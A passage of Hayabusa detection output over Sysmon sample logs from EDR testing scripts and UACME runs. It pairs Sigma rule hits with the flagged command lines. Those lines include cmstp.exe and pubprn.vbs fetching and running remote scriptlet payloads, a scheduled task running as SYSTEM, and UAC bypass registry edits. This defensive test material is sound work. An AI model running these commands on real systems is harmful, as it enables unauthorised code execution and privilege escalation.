https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 | LID: 0x413182 | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:21.867 
+09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49832 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:21.867 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49833 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\certutil.exe | PID: 4520 | PGUID: 747F3D96-665C-5D3F-0000-0010E37B8D00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6428 | PGUID: 747F3D96-6661-5D3F-0000-00107AB88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5888 | PGUID: 
747F3D96-6661-5D3F-0000-00103CBD8D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | Process: C:\Windows\System32\cmstp.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf | LID: 0x413182 | PID: 6820 | PGUID: 747F3D96-6661-5D3F-0000-0010CBC88D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2244 | PGUID: 747F3D96-6666-5D3F-0000-001016F78D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4976 | PGUID: 
747F3D96-6666-5D3F-0000-0010C6F88D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 1464 | PGUID: 747F3D96-6666-5D3F-0000-0010AE068E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x413182 | PID: 4336 | PGUID: 747F3D96-6666-5D3F-0000-0010DF098E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm qc -q | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5840 | PGUID: 747F3D96-666B-5D3F-0000-001051638E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1580 | PGUID: 747F3D96-666B-5D3F-0000-001033648E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6412 | PGUID: 747F3D96-666B-5D3F-0000-00107C668E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c winrm qc -q | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cscript //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""} | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | 
Parent Cmd: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} | LID: 0x413182 | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.421 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3224 | PGUID: 747F3D96-666B-5D3F-0000-00102F7F8E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: calc | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x413182 | PID: 3872 | PGUID: 747F3D96-666C-5D3F-0000-00104BB78E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning 
Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:36.548 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\cscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 264 | PGUID: 747F3D96-666B-5D3F-0000-0010EF858E00 | Hash: SHA1=23805C325D9D4F0A3467F6D2A402A259C376A7F0,MD5=D1B65A6CC7A53A0B68BEE51C639E8F01,SHA256=C948999A3823DA8EBA679F15ABAAEB5E057C91EB716A9DBF9F97FFD09E96CBF7,IMPHASH=2E1D1E35C17BE5497D2DE33F06DC41B4",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2916 | PGUID: 747F3D96-6670-5D3F-0000-001099048F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | 
LID: 0x413182 | PID: 4720 | PGUID: 747F3D96-6670-5D3F-0000-00105F098F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f | LID: 0x413182 | PID: 7076 | PGUID: 747F3D96-6670-5D3F-0000-0010F9148F00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Calculator Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:41.793 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\mysc | Process: C:\Windows\system32\svchost.exe | PID: 1028 | PGUID: 
747F3D96-DCFE-5D3F-0000-001044D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 747F3D96-6675-5D3F-0000-0010AA498F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6192 | PGUID: 747F3D96-6675-5D3F-0000-0010774E8F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | Process: C:\Windows\System32\cscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct | LID: 0x413182 | PID: 4036 | PGUID: 
747F3D96-6675-5D3F-0000-0010875C8F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,medium,Exec,Cscript Visual Basic Script Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 34 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.726 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"PrivEsc - UAC bypass UACME-34 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,,Process 
Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.436 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 18:46:49.502 
+09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,../hayabusa-rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
